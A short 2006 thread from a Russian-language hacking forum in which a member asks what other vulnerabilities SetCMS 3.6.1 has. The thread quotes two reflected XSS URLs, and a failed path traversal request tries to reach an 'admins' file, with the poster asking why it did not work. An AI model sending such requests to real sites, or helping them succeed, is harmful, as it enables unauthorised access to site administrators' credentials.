SetCMS 3.6.1

Discussion in 'PHP' started by Koller, 20 Feb 2006.

  1. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Подскажите пожалуйста, какие уязвимости имееются в этом движке, кроме этих xss:

    Code:
    www.***.ru/index.php?set=news&mc=read&date=<h1>бла-бла</h1>
    Code:
    www.***.ru/index.php?set=news&mc=readfull&do=6"><h1>бла-бла</h1>
     
    #1 Koller, 20 Feb 2006
  2. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    _________________________
    #2 madnet, 20 Feb 2006
  3. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    посмотри ещё на set-cms.com.ru или setcms.org все ихние уязвимости в новостях есть.
     
    _________________________
    #3 TANZWUT, 20 Feb 2006
  4. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Послал след. запрос:

    Code:
    www.****.ru/index.php?set=golos&mc=viewrezult&id=../admins
    Ничего как такового не отобразилось.
    Что я неправильно сделал?


    Как раз там я и нашел про эти 2 xss )
     
    #4 Koller, 20 Feb 2006
  5. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Народ.

    Подскажите, если не сложно, что я неправильно сделал?
     
    #5 Koller, 22 Feb 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.